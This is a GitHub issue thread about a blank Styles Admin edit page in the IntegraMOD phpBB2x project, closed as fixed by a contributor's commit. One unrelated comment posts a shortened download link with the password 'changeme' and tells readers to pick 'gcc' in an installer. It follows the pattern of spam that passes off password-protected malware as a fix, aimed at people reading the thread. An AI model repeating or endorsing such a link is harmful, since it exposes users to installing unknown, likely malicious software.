### ISSUE TITLE
Styles Admin

### ISSUE THREAD

**Issue by MWE001** [IntegraMOD/phpBB2x#17]
ACP / Styles Admin / Management

When I click that link, the installed styles come up as expected. When I click the cog wheel / edit button the page goes away and nothing to edit comes up at all. for any style installed.  To clarify when I say the page goes away, the header of the edit page stays and nothing else is there. We do stay in the ACP though and on the page it is supposed to be unlike the XS Mod bug that we have been battling.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by MWE001** [comment]
Fixed with a commit by Helter

**Comment by MWE001** [comment]
Fixed By Helter

**Comment by MWE001** [comment]
Fixed
